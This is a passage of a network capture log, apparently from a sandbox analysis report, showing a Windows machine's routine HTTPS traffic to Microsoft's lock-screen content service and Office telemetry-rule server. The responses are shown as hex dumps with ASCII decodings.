t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAWYBm1YhnWoZBXbxPqZv4jRbyYFHrXoCKR8yDlRnn5fz9cMrDvM+ENKhD58WblGKZvckPKo/wxPIBbNstb0a2ffybX7HLt0ANyVaSOF7yfazU1km1LRmAJImRCqRFOvbSeCgr9nGr4JJlK1g2kHWSY2n2Ux7l9qmifugenC5Seu7nro4iraU6TkR1XJDMLHsIcbGfec417uFzjU8iMpawtToPCYl8bkXGQiexGQckPwGJVuDOKlyRMvBKs4JFkcP4rplqE09bXs40pZZAjn6ud+JzDRRft/NA3aBoAlpWT2sXivcw68J8XKFlFMoxUE5ONabQJ3eLb0h2TwLTWSz3xAQZgAAEHiia57ZOKKGVfxa1MdokIiwAarKbrEoPrZgMTLds2BehW1ahw13UJQ3xPnFpMpY1DKsJaz1MtgbLHqfy+j/ijItarPsUYZNRT4/m0DWmeDG4ynj7mZq+3o/yGM2qVn7PeJKfHEO+GlXD3681O2bsFegUDSl3W+uv5WDEZ/ziUbtCu2zYtOH3eqlwqP0RzSHLsTIXc6Jzy4IqcIaZGSDMDOwswoDo9+pr38c+2XdGOoJAA8PaKWtN1nQpsMJnqoDvvFudXvijYItjCd+pX8R4mqBmX7OIcl3PhOpGHDixD/dfHeKTXh1sE71Acqb6Tur/f6CvIuSR+isV8ykDFvwZtXvRFBCzSpFdm5q0uXYPvJB8bd6wT6xJ6QtIxKxFWypKPUYXFdnvCLb5v5FxoocP8foAgpqk231am8Y/TM+JYyN6V9LvV215wI0Z+oUjq7xojOZeFqv/P8S7sN82fb+SPTsi5+3HD/jgTvfp37yQEjEuGRiIJ9I1ivcQoWli3A7EpkszyeR6bs7sRxOhScp9AAhlCAFqyIIEZyhMmGu5swmT6TkpojM9pAGdIHH/kvcbTylXAaEbHIqHdro+X3YUfeb0tcB&p= Cache-Control: no-cache MS-CV: KV23mrU2tE2b7UBv.0 User-Agent: WindowsShellClient/9.0.40929.0 (Windows) X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0 Host: arc.msn.com Connection: Keep-Alive
2024-11-23 06:09:17 UTC	815	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 23596 Content-Type: application/json; charset=utf-8 Expires: -1 Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [] X-ARC-SIG: YVLYCd09rUDEFo4w+MY4qh1YJdnS/W+XHMffyjBJidIziEDesw0c2tdiBYk1fEWA37t2uq+aJvtkWrNZ2y9Ka6Lh2YuC/Uf3YhyaMZuQSGc9J6gAQ6xY6O90u8FixySVQPG/mbRB0Kty5oAzmHHPF7SP//C5mSFt6oONUUi0kd7gq6MGCuXcf4D+peCZTHaiKdxZM+E4i+3SFDJGrxkZL/RjmGCdLaImbCvNcG6DKzacPvcLYRE4vQTYHgZ5HBwxTIaXlNCr+l+OVQO7ZUcDmX/K0WqgUr5uOqVSXBuJgJUQ4YyAen3PIaZhjOggPOm3HP48zJf4xc4U0ml9OLXd4g== Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Sat, 23 Nov 2024 06:09:17 GMT Connection: close
2024-11-23 06:09:17 UTC	15569	IN	Data Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 6e 61 6d 65 5c 22 3a 5c 22 4c 6f 63 6b 53 63 72 65 65 6e 5c 22 2c 5c 22 70 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 5c 22 6c 61 6e 64 73 63 61 70 65 49 6d 61 67 65 5c 22 3a 7b 5c 22 74 79 70 65 5c 22 3a 5c 22 69 6d 61 Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"name\":\"LockScreen\",\"propertyManifest\":{\"landscapeImage\":{\"type\":\"ima
2024-11-23 06:09:17 UTC	8027	IN	Data Raw: 4e 6f 51 57 51 6a 4f 44 51 79 4e 54 41 32 4d 7a 59 77 4d 54 59 78 4f 44 51 6a 4d 6a 4d 7a 4e 6a 41 30 4f 54 67 35 4d 6a 67 30 4d 6a 67 32 4d 51 3d 3d 5c 22 7d 2c 5c 22 5f 66 6c 69 67 68 74 5c 22 3a 5c 22 5c 22 7d 7d 22 7d 2c 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 6e 61 6d 65 5c 22 3a 5c 22 4c 6f 63 6b 53 63 72 65 65 6e 5c 22 2c 5c 22 70 72 6f 70 65 72 74 79 4d 61 6e 69 66 Data Ascii: NoQWQjODQyNTA2MzYwMTYxODQjMjMzNjA0OTg5Mjg0Mjg2MQ==\"},\"_flight\":\"\"}}"},{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"name\":\"LockScreen\",\"propertyManif

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49718	20.223.36.55	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:17 UTC	2587	OUT	GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=280815&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241123T060913Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=ba555dbd944448859b3909591936aa52&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=597591&metered=false&nettype=ethernet&npid=sc-280815&oemName=ehijqc%2C%20Inc.&oemid=Public&ossku=Professional&scmid=Public&smBiosDm=ehijqc20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=597591&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waas [TRUNCATED] Accept-Encoding: gzip, deflate X-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6 X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAWYBm1YhnWoZBXbxPqZv4jRbyYFHrXoCKR8yDlRnn5fz9cMrDvM+ENKhD58WblGKZvckPKo/wxPIBbNstb0a2ffybX7HLt0ANyVaSOF7yfazU1km1LRmAJImRCqRFOvbSeCgr9nGr4JJlK1g2kHWSY2n2Ux7l9qmifugenC5Seu7nro4iraU6TkR1XJDMLHsIcbGfec417uFzjU8iMpawtToPCYl8bkXGQiexGQckPwGJVuDOKlyRMvBKs4JFkcP4rplqE09bXs40pZZAjn6ud+JzDRRft/NA3aBoAlpWT2sXivcw68J8XKFlFMoxUE5ONabQJ3eLb0h2TwLTWSz3xAQZgAAEHiia57ZOKKGVfxa1MdokIiwAarKbrEoPrZgMTLds2BehW1ahw13UJQ3xPnFpMpY1DKsJaz1MtgbLHqfy+j/ijItarPsUYZNRT4/m0DWmeDG4ynj7mZq+3o/yGM2qVn7PeJKfHEO+GlXD3681O2bsFegUDSl3W+uv5WDEZ/ziUbtCu2zYtOH3eqlwqP0RzSHLsTIXc6Jzy4IqcIaZGSDMDOwswoDo9+pr38c+2XdGOoJAA8PaKWtN1nQpsMJnqoDvvFudXvijYItjCd+pX8R4mqBmX7OIcl3PhOpGHDixD/dfHeKTXh1sE71Acqb6Tur/f6CvIuSR+isV8ykDFvwZtXvRFBCzSpFdm5q0uXYPvJB8bd6wT6xJ6QtIxKxFWypKPUYXFdnvCLb5v5FxoocP8foAgpqk231am8Y/TM+JYyN6V9LvV215wI0Z+oUjq7xojOZeFqv/P8S7sN82fb+SPTsi5+3HD/jgTvfp37yQEjEuGRiIJ9I1ivcQoWli3A7EpkszyeR6bs7sRxOhScp9AAhlCAFqyIIEZyhMmGu5swmT6TkpojM9pAGdIHH/kvcbTylXAaEbHIqHdro+X3YUfeb0tcB&p= Cache-Control: no-cache MS-CV: KV23mrU2tE2b7UBv.0 User-Agent: WindowsShellClient/9.0.40929.0 (Windows) X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0 Host: arc.msn.com Connection: Keep-Alive
2024-11-23 06:09:17 UTC	955	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Length: 2937 Content-Type: application/json; charset=utf-8 Expires: Mon, 01 Jan 0001 00:00:00 GMT Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [{"RADIDS":"1,P425116123-T1-C128000000001627409+B+P20+S1"},{"OPTOUTSTATE":"65792"},{"REGIONALPOLICY":"1"}] X-ARC-SIG: VGgPWsnS6u2L8lKc07i2zQSvxoAP9LbC9ehm1P2/uVbGySlazD1kUs0lhxv62OOp3m73dAS4xFwSzTCRRDYvzLuFCuaEDmp7g3gFsDCP6wOMofG80iEGYWO40/Zqf4Kij6tzpDaWw453CEPOy4R2jT/sPC7hNUlxUUW/mpgPJo5/LURqvVkg1delIyCy/3drJEJIQNbDDcWm4dOOXXxTfqmrekt7BQ6E35X1Oexx2WIn/PI362g/bCRfVrm37w9Mj5AFbx67r2vBUbYmb189n/8v+0ZdF86Wo07Ubyu1AWFmm06V7z8J853FMxlk+DP2CUgiC86ZlA8soLcLBdJ5aw== Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Sat, 23 Nov 2024 06:09:17 GMT Connection: close
2024-11-23 06:09:17 UTC	2937	IN	Data Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 69 74 65 6d 50 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 5c 22 6e 6f 4f 70 5c 22 3a 7b 5c 22 74 79 70 65 5c 22 3a 5c 22 61 63 74 69 6f 6e 5c 22 7d 7d 2c 5c 22 69 74 65 6d 73 5c 22 3a 5b 7b 5c 22 70 72 6f 70 65 72 74 69 Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"itemPropertyManifest\":{\"noOp\":{\"type\":\"action\"}},\"items\":[{\"properti

Session ID	Source IP	Source Port	Destination IP	Destination Port
9	192.168.2.6	49721	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:18 UTC	195	OUT	GET /rules/other-Win32-v19.bundle HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:18 UTC	471	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:18 GMT Content-Type: text/plain Content-Length: 218853 Connection: close Vary: Accept-Encoding Cache-Control: public Last-Modified: Thu, 21 Nov 2024 12:25:08 GMT ETag: "0x8DD0A27899CAFB6" x-ms-request-id: cb7fa3cf-001e-000b-073d-3c15a7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060918Z-174c587ffdf8lw6dhC1TEBkgs800000002n0000000001nd1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:18 UTC	15913	IN	Data Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20 Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
2024-11-23 06:09:18 UTC	16384	IN	Data Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
2024-11-23 06:09:18 UTC	16384	IN	Data Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
2024-11-23 06:09:18 UTC	16384	IN	Data Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
2024-11-23 06:09:18 UTC	16384	IN	Data Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20 Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
2024-11-23 06:09:18 UTC	16384	IN	Data Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
2024-11-23 06:09:18 UTC	16384	IN	Data Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
2024-11-23 06:09:18 UTC	16384	IN	Data Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
2024-11-23 06:09:18 UTC	16384	IN	Data Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
2024-11-23 06:09:18 UTC	16384	IN	Data Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> 